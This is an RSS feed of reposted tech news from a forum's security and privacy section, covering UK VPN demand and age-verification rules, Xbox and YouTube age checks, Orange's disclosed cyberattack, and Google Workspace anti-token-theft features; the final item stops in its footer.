<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/20/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>VPN demand erupts in UK &#x2014; outpacing France in the face of adult content rules</title><link>https://nsaneforums.com/news/security-privacy-news/vpn-demand-erupts-in-uk-%E2%80%94-outpacing-france-in-the-face-of-adult-content-rules-r30515/</link><description><![CDATA[<h3>
	The French may be known for romance, but people in the UK just broke the internet trying to keep their browsing private.
</h3>

<p>
	Last Friday, the UK's Online Safety Act went into effect, requiring websites and social media platforms to prevent children from accessing "adult" content. Following the enactment of the law, VPN usage spiked in the UK.
</p>

<p>
	 
</p>

<p>
	The rapid increase in VPN demand was known to some extent in the immediate aftermath of the Online Safety Act going into effect. <a data-analytics-id="inline-link" data-google-interstitial="false" data-hl-processed="hawklinks" data-merchant-name="go.getproton.me" data-merchant-url="go.getproton.me" data-placeholder-url="https://go.getproton.me/aff_c?offer_id=25&amp;source=windowscentral&amp;url=https%3A%2F%2Fprotonvpn.com%2Finternet-censorship-observatory%3FvisitorId%3Dho-%7Btransaction_id%7D%26aid%3D%7Baffiliate_id%7D%26offer_id%3D%7Boffer_id%7D%26url_id%3D%7Boffer_url_id%7D%26utm_campaign%3Dww-all-2a-vpn-gro_aff-g_acq-partners_program%26utm_medium%3Dlink%26utm_source%3Daid-tune-%7Baffiliate_id%7D%26utm_content%3D%7Boffer_id%7D%26hfp%3Dfalse%26spl%3D%7Baffiliate_id%7D&amp;aff_id=1046&amp;aff_click_id=hawk-custom-tracking&amp;aff_sub2=hawk-article-url" data-url="https://go.getproton.me/aff_c?offer_id=25&amp;aff_id=1046&amp;source=windowscentral&amp;aff_click_id=wp-gb-4827577218001371123&amp;url=https%3A%2F%2Fprotonvpn.com%2Finternet-censorship-observatory%3FvisitorId%3Dho-%7Btransaction_id%7D%26aid%3D%7Baffiliate_id%7D%26offer_id%3D%7Boffer_id%7D%26url_id%3D%7Boffer_url_id%7D%26utm_campaign%3Dww-all-2a-vpn-gro_aff-g_acq-partners_program%26utm_medium%3Dlink%26utm_source%3Daid-tune-%7Baffiliate_id%7D%26utm_content%3D%7Boffer_id%7D%26hfp%3Dfalse%26spl%3D%7Baffiliate_id%7D&amp;aff_sub2=https%3A%2F%2Fwww.windowscentral.com%2Fgaming%2Fgamers-bypass-uk-age-verification-with-death-stranding-no-real-face-or-vpn-required" href="https://go.getproton.me/aff_c?offer_id=25&amp;source=windowscentral&amp;url=https%3A%2F%2Fprotonvpn.com%2Finternet-censorship-observatory%3FvisitorId%3Dho-%7Btransaction_id%7D%26aid%3D%7Baffiliate_id%7D%26offer_id%3D%7Boffer_id%7D%26url_id%3D%7Boffer_url_id%7D%26utm_campaign%3Dww-all-2a-vpn-gro_aff-g_acq-partners_program%26utm_medium%3Dlink%26utm_source%3Daid-tune-%7Baffiliate_id%7D%26utm_content%3D%7Boffer_id%7D%26hfp%3Dfalse%26spl%3D%7Baffiliate_id%7D&amp;aff_id=1046&amp;aff_click_id=wp-gb-8144312755906187690&amp;aff_sub2=https%3A%2F%2Fwww.windowscentral.com%2Fsoftware-apps%2Fvpn-demand-erupts-in-uk-outpacing-france-in-the-face-of-adult-content-rules" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">Proton VPN observed a 1400% hourly increase</a> in sign-ups and Google searches for "Proton" increased 100-fold on July 25.
</p>

<p>
	 
</p>

<p>
	Now, thanks to figures from <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.vpnmentor.com/news/uk-vpn-surge/" href="https://www.vpnmentor.com/news/uk-vpn-surge/" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">vpnMentor</a>, we have more insight regarding VPN usage in the UK.
</p>

<p>
	 
</p>

<p>
	According the the researchers at vpnMentor, demand for VPN services in the UK increased steadily following the Online Safety Act going into effect. Demand peaked at 6,430% and remained at that level for nearly two hours.
</p>

<p>
	 
</p>

<p>
	While that demand decreased over the weekend, there were spikes between 900% and 4,000%.
</p>

<p>
	 
</p>

<p>
	Five different VPN providers are now among the 10 most downloaded apps through Apple's App Store. ProtonVPN sits in the number one spot with NordVPN, placing two of the best VPNs in the top 10. A few lesser-known services are also on the list.
</p>

<h3 class="article-body__section" id="section-bypassing-online-safety-act">
	<span>Bypassing Online Safety Act</span>
</h3>

<div>
	<div>
		<p>
			<picture><source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/uQLRPRWi5B7b2kdaWeGpeT-320-80.jpg.webp 320w, https://cdn.mos.cms.futurecdn.net/uQLRPRWi5B7b2kdaWeGpeT-480-80.jpg.webp 480w, https://cdn.mos.cms.futurecdn.net/uQLRPRWi5B7b2kdaWeGpeT-650-80.jpg.webp 650w, https://cdn.mos.cms.futurecdn.net/uQLRPRWi5B7b2kdaWeGpeT-970-80.jpg.webp 970w, https://cdn.mos.cms.futurecdn.net/uQLRPRWi5B7b2kdaWeGpeT-1024-80.jpg.webp 1024w, https://cdn.mos.cms.futurecdn.net/uQLRPRWi5B7b2kdaWeGpeT-1200-80.jpg.webp 1200w" type="image/webp"><img alt="Death Stranding Sam" class="ipsImage" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/uQLRPRWi5B7b2kdaWeGpeT-1024-80.jpg"></source></picture>
		</p>

		<p>
			<em><span>The video game Death Stranding has a photo mode that has been used to bypass age verification systems. </span></em>
		</p>

		<p>
			<em><span itemprop="copyrightHolder">(Image credit: Kojima Productions)</span></em>
		</p>

		<p>
			 
		</p>

		<p>
			The new legislation in the UK has proven controversial. Some, including Elon Musk, called the Online Safety Act a "suppression of free speech." X has had its own <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/gaming/xbox/xbox-age-verification-uk-changes-2026" href="https://www.windowscentral.com/gaming/xbox/xbox-age-verification-uk-changes-2026" rel="external nofollow">issues verifying the age of users</a>, but Musk says those are being worked on.
		</p>

		<p>
			 
		</p>

		<div id="slice-container-newsletterForm-articleInbodyContent-noj67kKMix6YEycVSLED8Q">
			<div data-hydrate="true">
				<p>
					Many have been hesitant to share personal information to view online content. In a best case scenario, the face scans or pictures of IDs shared to verify age are secure. It appears some users fear a worst case scenario in which selfies, photos of ID, credit card details, or other sensitive information gets exposed.
				</p>

				<p>
					 
				</p>

				<p>
					People have found various methods of bypassing age verification systems, ranging from finding a generic driver's license online to <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/gaming/gamers-bypass-uk-age-verification-with-death-stranding-no-real-face-or-vpn-required" href="https://www.windowscentral.com/gaming/gamers-bypass-uk-age-verification-with-death-stranding-no-real-face-or-vpn-required" rel="external nofollow">using the photo mode of the video game Death Stranding</a>.
				</p>

				<p>
					 
				</p>

				<p>
					Bypass methods vary in success rate depending on the specific system a website uses. For example, <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/discord" href="https://www.windowscentral.com/tag/discord" rel="external nofollow">Discord</a>'s k-ID system was fooled by the image from Death Stranding.
				</p>

				<p>
					 
				</p>

				<p>
					Yoti is a third-party age-verification software used by Instagram, OnlyFans, and many other websites. It is now one of the most downloaded apps in the UK, likely due to so many sites relying on it for age verification.
				</p>

				<p>
					 
				</p>

				<p>
					While many dislike the legislation, companies need to take it seriously. Penalties for violating the Online Safety Act can include fines of up to £18m or 10% of global turnover. For a larger company, that could potentially mean billions of pounds in fines.
				</p>

				<h3 class="article-body__section" id="section-uk-vs-france">
					<span>UK vs France</span>
				</h3>

				<p>
					An interesting bit of information to come out of this saga is that people in the UK seem quicker to jump to VPN usage when faced with blocked content.
				</p>

				<p>
					 
				</p>

				<p>
					“Unlike previous surges, this one is sustained, and is significantly higher than when France lost access to adult content," said Proton VPN.
				</p>

				<p>
					 
				</p>

				<p>
					vpnMentor has tracked surges that occurred in similar situations, such as when France saw an 874% surge in demand after Pornhub and other pornographic websites owned by Aylo were blocked in the country. That pullout of services was done in response to age verification laws in France.
				</p>

				<p>
					 
				</p>

				<p>
					Without more information, it's difficult to determine why VPN services would see a larger spike in the UK than in France. It could be due to which sites were blocked or it could suggest which types of content are popular in the UK.
				</p>

				<p>
					 
				</p>

				<p>
					<a href="https://www.windowscentral.com/software-apps/vpn-demand-erupts-in-uk-outpacing-france-in-the-face-of-adult-content-rules" rel="external nofollow">Source</a>
				</p>

				<hr class="ipsHr">
				<p>
					<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>Posted Wednesday 30 July 2025 at 12:06 pm AEST (my time).</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
				</p>

				<p>
					<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
				</p>
			</div>
		</div>
	</div>
</div>
]]></description><guid isPermaLink="false">30515</guid><pubDate>Wed, 30 Jul 2025 02:07:46 +0000</pubDate></item><item><title>Elon Musk is 'working on' UK age verification for X &#x2014; and Xbox should steal his idea</title><link>https://nsaneforums.com/news/security-privacy-news/elon-musk-is-working-on-uk-age-verification-for-x-%E2%80%94-and-xbox-should-steal-his-idea-r30514/</link><description><![CDATA[<h3>
	Even Xbox users with accounts more than 20 years old need to verify their age in the UK.
</h3>

<p>
	Age verification is the trending topic of the week. Last Friday, the UK's Online Safety Act went into effect, requiring websites to verify the age of anyone hoping to look at adult content.
</p>

<p>
	 
</p>

<p>
	While the law covers content most people would consider "adult," such as pornography, it also affects social media services and communication platforms.
</p>

<p>
	 
</p>

<p>
	<a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/discord" href="https://www.windowscentral.com/tag/discord" rel="external nofollow">Discord</a> and <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/reddit" href="https://www.windowscentral.com/tag/reddit" rel="external nofollow">Reddit</a> are among the many sites that now require age verification if you're in the UK, though the former's system can be <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/gaming/gamers-bypass-uk-age-verification-with-death-stranding-no-real-face-or-vpn-required" href="https://www.windowscentral.com/gaming/gamers-bypass-uk-age-verification-with-death-stranding-no-real-face-or-vpn-required" rel="external nofollow">bypassed by using the photo mode in Death Stranding</a>.
</p>

<p>
	 
</p>

<p>
	VPN usage is also on the rise. Proton VPN playfully suggested that the spike is not due to people trying to watch football. At one point, <a data-analytics-id="inline-link" data-google-interstitial="false" data-hl-processed="hawklinks" data-merchant-name="go.getproton.me" data-merchant-url="go.getproton.me" data-placeholder-url="https://go.getproton.me/aff_c?offer_id=25&amp;source=windowscentral&amp;url=https%3A%2F%2Fprotonvpn.com%2Finternet-censorship-observatory%3FvisitorId%3Dho-%7Btransaction_id%7D%26aid%3D%7Baffiliate_id%7D%26offer_id%3D%7Boffer_id%7D%26url_id%3D%7Boffer_url_id%7D%26utm_campaign%3Dww-all-2a-vpn-gro_aff-g_acq-partners_program%26utm_medium%3Dlink%26utm_source%3Daid-tune-%7Baffiliate_id%7D%26utm_content%3D%7Boffer_id%7D%26hfp%3Dfalse%26spl%3D%7Baffiliate_id%7D&amp;aff_id=1046&amp;aff_click_id=hawk-custom-tracking&amp;aff_sub2=hawk-article-url" data-url="https://go.getproton.me/aff_c?offer_id=25&amp;aff_id=1046&amp;source=windowscentral&amp;aff_click_id=wp-gb-4827577218001371123&amp;url=https%3A%2F%2Fprotonvpn.com%2Finternet-censorship-observatory%3FvisitorId%3Dho-%7Btransaction_id%7D%26aid%3D%7Baffiliate_id%7D%26offer_id%3D%7Boffer_id%7D%26url_id%3D%7Boffer_url_id%7D%26utm_campaign%3Dww-all-2a-vpn-gro_aff-g_acq-partners_program%26utm_medium%3Dlink%26utm_source%3Daid-tune-%7Baffiliate_id%7D%26utm_content%3D%7Boffer_id%7D%26hfp%3Dfalse%26spl%3D%7Baffiliate_id%7D&amp;aff_sub2=https%3A%2F%2Fwww.windowscentral.com%2Fgaming%2Fgamers-bypass-uk-age-verification-with-death-stranding-no-real-face-or-vpn-required" href="https://go.getproton.me/aff_c?offer_id=25&amp;source=windowscentral&amp;url=https%3A%2F%2Fprotonvpn.com%2Finternet-censorship-observatory%3FvisitorId%3Dho-%7Btransaction_id%7D%26aid%3D%7Baffiliate_id%7D%26offer_id%3D%7Boffer_id%7D%26url_id%3D%7Boffer_url_id%7D%26utm_campaign%3Dww-all-2a-vpn-gro_aff-g_acq-partners_program%26utm_medium%3Dlink%26utm_source%3Daid-tune-%7Baffiliate_id%7D%26utm_content%3D%7Boffer_id%7D%26hfp%3Dfalse%26spl%3D%7Baffiliate_id%7D&amp;aff_id=1046&amp;aff_click_id=wp-gb-1279608589781189626&amp;aff_sub2=https%3A%2F%2Fwww.windowscentral.com%2Fgaming%2Fxbox%2Felon-musk-is-working-on-uk-age-verification-for-x-and-xbox-should-steal-his-idea" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">Proton VPN observed a 1400% hourly increase.</a>
</p>

<p>
	 
</p>

<p>
	Xbox is also rolling out a system for <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/gaming/xbox/xbox-age-verification-uk-changes-2026" href="https://www.windowscentral.com/gaming/xbox/xbox-age-verification-uk-changes-2026" rel="external nofollow">users to verify their ages</a>. Starting this week, Xbox users who have their age set to 18 or over in the UK need to sign in to their Xbox profiles and verify their age with an approved method.
</p>

<p>
	 
</p>

<p>
	Xbox relies on Yoti for age verification. Users can either take a photo for the system to estimate their age or scan a government-issued ID such as a passport, driver's license, or national ID.
</p>

<p>
	 
</p>

<ul>
	<li>
		<strong>Age verification:</strong> <a data-hl-processed="none" data-url="https://aka.ms/XboxUKAgeVerification" href="https://aka.ms/XboxUKAgeVerification" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow"><u>https://aka.ms/XboxUKAgeVerification</u></a>
	</li>
</ul>

<p>
	 
</p>

<p>
	You can also verify your age by entering your credit card details or by entering your mobile phone number and having your provider confirm you are an adult.
</p>

<p>
	 
</p>

<div id="slice-container-newsletterForm-articleInbodyContent-FHvgFCwSVz6Syu5Hu96ZAa">
	<div data-hydrate="true">
		<p>
			The page to verify your age emphasizes privacy and security, but some people are hesitant to share such information.
		</p>

		<h3 class="article-body__section" id="section-a-better-way">
			<span>A better way</span>
		</h3>

		<div>
			<div>
				<p>
					<picture><source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/qnf2oCnnZvDjNTvehddxHY-320-80.jpg.webp 320w, https://cdn.mos.cms.futurecdn.net/qnf2oCnnZvDjNTvehddxHY-480-80.jpg.webp 480w, https://cdn.mos.cms.futurecdn.net/qnf2oCnnZvDjNTvehddxHY-650-80.jpg.webp 650w, https://cdn.mos.cms.futurecdn.net/qnf2oCnnZvDjNTvehddxHY-970-80.jpg.webp 970w, https://cdn.mos.cms.futurecdn.net/qnf2oCnnZvDjNTvehddxHY-1024-80.jpg.webp 1024w, https://cdn.mos.cms.futurecdn.net/qnf2oCnnZvDjNTvehddxHY-1200-80.jpg.webp 1200w" type="image/webp"><img alt="Original Xbox Duke Controller" class="ipsImage" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/qnf2oCnnZvDjNTvehddxHY-1024-80.jpg"></source></picture>
				</p>

				<p>
					 
				</p>

				<p>
					<em><span>If you've played Xbox since the days of the original Duke controller, perhaps you shouldn't have to scan your face or an ID to prove your age. </span><span itemprop="copyrightHolder">(Image credit: Jennifer Young - Windows Central)</span></em>
				</p>

				<p>
					 
				</p>

				<p>
					I understand that Microsoft needs to comply with local laws, so the tech giant has to implement age verification. But the current options feel unnecessarily limited.
				</p>

				<p>
					 
				</p>

				<p>
					As highlighted by <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.reddit.com/r/xbox/comments/1mbmsay/comment/n5nbe7u/?utm_source=share&amp;utm_medium=web3x&amp;utm_name=web3xcss&amp;utm_term=1&amp;utm_content=share_button" href="https://www.reddit.com/r/xbox/comments/1mbmsay/comment/n5nbe7u/?utm_source=share&amp;utm_medium=web3x&amp;utm_name=web3xcss&amp;utm_term=1&amp;utm_content=share_button" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">several Reddit users</a>, many people have Xbox accounts that are over 20 years old. If you've used the same Xbox account for two decades, you are presumably old enough to view adult content or play Xbox games online without any restrictions.
				</p>

				<p>
					 
				</p>

				<p>
					"But what if you give your account to someone else?" you may ask. In that case, it wouldn't matter which method you used for age verification, because someone could pass the Yoti requirements to confirm their age and then let anyone else use their account.
				</p>

				<p>
					 
				</p>

				<p>
					It’s one of several flaws in the system. Others include the fact that you can trick Discord with a game’s photo mode or upload a generic driver’s license found on Google to bypass the system used by several sites.
				</p>

				<h3 class="article-body__section" id="section-copying-elon-musk">
					<span>Copying Elon Musk</span>
				</h3>

				<p>
					I didn't expect myself to suggest emulating Elon Musk this week, but X has a possible solution for age verification that Xbox should copy. One of the ways <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://help.x.com/en/rules-and-policies/age-assurance" href="https://help.x.com/en/rules-and-policies/age-assurance" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">X verifies age</a> is checking the age of an account. If an account was created before 2012, the site assumes you're an adult now.
				</p>

				<p>
					 
				</p>

				<p>
					It's not a perfect solution, since someone could have lied about their age back in 2012 and still be under 18 today. But I doubt any reasonable verification method will be perfect.
				</p>

				<p>
					 
				</p>

				<p>
					<a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://x.com/elonmusk/status/1949706678561013985" href="https://x.com/elonmusk/status/1949706678561013985" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">X has run into some issues with age verification</a>, which Musk says are being addressed. "We are working on this," said Musk in a post replying to a UK user who cannot verify their age on X. The Xbox team may want to copy Musk's general idea but execute it better.
				</p>

				<p>
					 
				</p>

				<p>
					Where Microsoft and the Xbox team draw their line could be different than what X decided. Since a five-year-old is more likely to have played Xbox in the past, it's probably worth having different rules.
				</p>

				<p>
					 
				</p>

				<p>
					But any account old enough to legally drink in the UK should be verified automatically.
				</p>

				<p>
					 
				</p>

				<p>
					<a href="https://www.windowscentral.com/gaming/xbox/elon-musk-is-working-on-uk-age-verification-for-x-and-xbox-should-steal-his-idea" rel="external nofollow">Source</a>
				</p>

				<hr class="ipsHr">
				<p>
					<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>Posted Wednesday 30 July 2025 at 12:05 pm AEST (my time).</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
				</p>

				<p>
					<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
				</p>
			</div>
		</div>
	</div>
</div>
]]></description><guid isPermaLink="false">30514</guid><pubDate>Wed, 30 Jul 2025 02:06:39 +0000</pubDate></item><item><title>YouTube is bringing its age detection tech to the U.S. to identify minors</title><link>https://nsaneforums.com/news/security-privacy-news/youtube-is-bringing-its-age-detection-tech-to-the-us-to-identify-minors-r30513/</link><description><![CDATA[<p>
	YouTube hosts a wide range of video content on its platform, some of which may not be suitable to minors. For some of that audience, Google recommends the <a automate_uuid="413d3b93-b79d-40b9-aacc-cfa16c411838" href="https://www.neowin.net/news/youtube-kids-adds-support-for-vertical-ui-on-android-and-ios/" rel="external nofollow">YouTube Kids app</a> which offers child-friendly content with parental controls. However, some minors still circumvent measures put in place by the platform or their parents, so now, YouTube wants to put a stop to that.
</p>

<p>
	 
</p>

<p>
	YouTube has <a automate_uuid="d2e99390-37cc-4349-a89c-231d3782b715" href="https://blog.youtube/news-and-events/extending-our-built-in-protections-to-more-teens-on-youtube/" rel="external nofollow">revealed</a> plans to bring its age detection technology to the United States. This is a machine learning algorithm which will infer a user's age based on various signals and traits such as the type of content they watch, the categories of their search queries, and the age of their account, among other things.
</p>

<p>
	 
</p>

<p>
	If an account is identified as belonging to a teen, YouTube will immediately stop personalized advertising for that account, turn on digital well-being tools, and stop the person from viewing repetitive content.
</p>

<p>
	 
</p>

<p>
	If this is a true positive detection, the user will just have to bear with the aforementioned consequences. However, in the case of a false positive, the affected person will be required to share their government-issued ID or credit card information.
</p>

<p>
	 
</p>

<p>
	Google will start rolling out this technology to a limited subset of customers in the U.S. in the coming weeks and then monitor its results. This is not its first rodeo in this field as it has already deployed and tested the model in other countries. Still, the company will closely monitor the outcome of the age detection tech and its accuracy.
</p>

<p>
	 
</p>

<p>
	YouTube has emphasized that it is committing to serving child-friendly content to minors and protect them from age-inappropriate material. It's unclear how accurate its age detection technology is, but we'll likely find out in the next few weeks. If this trial is successful, Google will probably roll it out to a larger audience in the U.S. and might expand to other countries too.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/youtube-is-bring-its-age-detection-tech-to-the-us-to-identify-minors/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Wednesday 30 July 2025 at 12:04 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30513</guid><pubDate>Wed, 30 Jul 2025 02:05:03 +0000</pubDate></item><item><title>French telecom giant Orange discloses cyberattack</title><link>https://nsaneforums.com/news/security-privacy-news/french-telecom-giant-orange-discloses-cyberattack-r30502/</link><description><![CDATA[<p>
	Orange, a French telecommunications company and one of the world's largest telecom operators, revealed that it detected a breached system on its network on Friday.
</p>

<p>
	 
</p>

<p>
	The compromised system was discovered and isolated from the rest of the network by Orange Cyberdefense, the company's cybersecurity business unit, on July 25. This has led to some operational disruptions, primarily affecting French customers, which are expected to be gradually resolved by Wednesday morning, July 30.
</p>

<p>
	 
</p>

<p>
	"On Friday, July 25, the Orange Group detected a cyberattack on one of its information systems. Immediately alerted, with the support of Orange Cyberdefense, the teams mobilized fully to isolate the potentially affected services and limit the impact," the telecom giant <a href="https://newsroom.orange.com/le-groupe-orange-annonce-avoir-depose-plainte-lundi-28-juillet-pour-atteinte-a-un-de-ses-systemes-dinformation/" rel="external nofollow" target="_blank">said</a>.
</p>

<p>
	 
</p>

<p>
	"However, these isolation operations resulted in the disruption of certain services and management platforms for some of our business customers and for a few consumer services, mainly in France."
</p>

<p>
	 
</p>

<p>
	Since detecting this cyberattack, the company has alerted the relevant authorities and filed a complaint. Also, its investigation team has yet to find evidence that any data was stolen during the breach.
</p>

<p>
	 
</p>

<p>
	"At this stage of the investigation, there is no evidence to suggest that any customer or Orange data has been extracted. We remain vigilant in this regard," the company added.
</p>

<p>
	 
</p>

<p>
	While Orange has not attributed the cyberattack to a specific hacking group or threat actor, the incident bears resemblance to a series of widespread breaches of telecom providers in the United States and worldwide that have been linked to China's <a href="https://www.bleepingcomputer.com/tag/salt-typhoon/" rel="external nofollow" target="_blank">Salt Typhoon cyber-espionage group</a>.
</p>

<p>
	 
</p>

<p>
	The FBI and CISA <a href="https://www.bleepingcomputer.com/news/security/us-says-chinese-hackers-breached-multiple-telecom-providers/" rel="external nofollow" target="_blank">confirmed</a> in October that the Chinese Salt Typhoon state hackers had breached multiple telecom providers (including AT&amp;T, Verizon, Lumen, Charter Communications, Consolidated Communications, and Windstream), as well as other telecom companies in <a href="https://www.bleepingcomputer.com/news/security/white-house-salt-typhoon-hacked-telcos-in-dozens-of-countries/" rel="external nofollow" target="_blank">dozens of other countries</a>.
</p>

<p>
	 
</p>

<p>
	Last month, Comcast and Digital Realty <a href="https://www.nextgov.com/cybersecurity/2025/06/us-agencies-assessed-chinese-telecom-hackers-likely-hit-data-center-and-residential-internet-providers/405920/" rel="external nofollow" target="_blank">were also tagged</a> as potentially compromised by Salt Typhoon, with satellite communications company Viasat revealing weeks later that it <a href="https://www.bleepingcomputer.com/news/security/telecom-giant-viasat-breached-by-chinas-salt-typhoon-hackers/" rel="external nofollow" target="_blank">had also been breached</a> as part of the same attacks.
</p>

<p>
	 
</p>

<p>
	In February, Orange's Romanian branch was hit by another cyberattack, with the company <a href="https://www.bleepingcomputer.com/news/security/orange-group-confirms-breach-after-hacker-leaks-company-documents/" rel="external nofollow" target="_blank">confirming the breach of a non-critical application</a> after a threat actor using the alias 'Rey' claimed to have stolen thousands of internal documents containing employee data, user records, source code, invoices, contracts, and 380,000 email addresses.
</p>

<p>
	 
</p>

<p>
	Orange provides consumer communication services and business services to 294 million customers across Europe, Africa, and the Middle East, including 256 million mobile and 22 million fixed broadband customers. Orange also provides IT and telecommunications services to multinational companies under the brand Orange Business, has 125,800 employees worldwide, and reported revenues of €40.3 billion in 2024.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/french-telecommunications-giant-orange-discloses-cyberattack/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Wednesday 30 July 2025 at 4:05 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30502</guid><pubDate>Tue, 29 Jul 2025 18:06:28 +0000</pubDate></item><item><title>Google is making it harder for hackers to hijack your Workspace account</title><link>https://nsaneforums.com/news/security-privacy-news/google-is-making-it-harder-for-hackers-to-hijack-your-workspace-account-r30501/</link><description><![CDATA[<p>
	Google says that it is introducing three enhancements to help organizations combat cookie and auth token theft, something the company claims is behind 37% of successful account takeovers.
</p>

<p>
	 
</p>

<p>
	The rise in email-delivered infostealers has made this a massive problem, with attackers finding new ways to snatch the session data that keeps you logged into services. This allows them to bypass even multi-factor authentication and casually walk right into your accounts.
</p>

<p>
	 
</p>

<p>
	The first enhancement is bringing passkey support to all <a automate_uuid="2d1afba3-3ff9-4f6f-9a53-81f52b6f2f18" href="https://www.neowin.net/news/google-workspace-brings-10-free-ai-features-for-nonprofit-organizations/" rel="external nofollow">Google Workspace</a> customers. Google claims this offers benefits like ease of use and stronger security since passkeys are tied to a device and cannot be phished.
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		Passkey support is now generally available to more than 11 million Google Workspace customers, with expanded admin capabilities to audit enrollment and restrict passkeys to physical security keys.
	</p>
</blockquote>

<p>
	Next, we have Device Bound Session Credentials (DBSC), now available in open beta, which protects you after you have already signed in. The way it works is: your browser generates a unique public and private key pair when you log in. The private key stays locked down on your machine, ideally in a hardware security chip, while the public key goes to the server. To keep the session alive, the server periodically sends a challenge that only the device with the private key can correctly answer.
</p>

<figure class="image image--expandable">
	<img alt="Google Admin Console" class="ipsImage" height="317" width="720" src="https://cdn.neowin.com/news/images/uploaded/2025/07/1753803006_screenshot_obwtgp9.max-1700x1700.webp">
	<figcaption>
		<p>
			<em>Admin console UI for the Google session control section to enable DBSC </em>
		</p>

		<p>
			<em>Image: <a automate_uuid="e5f8f306-500b-4cd8-bf58-0296b7d19505" href="https://workspace.google.com/blog/identity-and-security/defending-against-account-takeovers-top-threats-passkeys-and-dbsc?e=48754805" rel="external nofollow">Google</a></em>
		</p>
	</figcaption>
</figure>

<p>
	If someone steals your session cookie, it is useless on their machine because they do not have that key. At the moment, this feature is only available on Chrome for Windows.
</p>

<p>
	 
</p>

<p>
	You might remember back in 2023 when tech YouTuber Linus Sebastian <a automate_uuid="1fe40746-3794-4ef3-99e9-14f386198e42" href="https://www.neowin.net/news/the-linus-tech-tips-youtube-channel-is-the-latest-to-be-taken-over-by-hackers/" rel="external nofollow">had his Linus Tech Tips (alongside the Techquickie sister channel) hacked</a>. The way the attackers were able to gain access was through a malicious file disguised as a PDF in a sponsorship offer email.
</p>

<p>
	 
</p>

<p>
	After a staff member opened the file, it stole the channel's session tokens, giving the hackers full control to run cryptocurrency scams. DBSC is designed to make that kind of credential theft much harder.
</p>

<p>
	 
</p>

<p>
	And lastly, <a automate_uuid="ad6c4dc6-50bb-4172-9270-f347a94be80c" href="https://workspace.google.com/blog/identity-and-security/defending-against-account-takeovers-top-threats-passkeys-and-dbsc?e=48754805" rel="external nofollow">the company says</a> that later this year, it will be introducing a <a automate_uuid="80b34a9f-6df9-49d6-b3f9-c82b61c40711" href="https://openid.net/specs/openid-sharedsignals-framework-1_0-ID3.html" rel="external nofollow">shared signals framework (SSF)</a> receiver. This basically means that different security services can talk to each other in a standardized way. If your identity provider detects a problem with your account, it can send a signal to Google to immediately terminate your session.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/google-is-making-it-harder-for-hackers-to-hijack-your-workspace-account/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
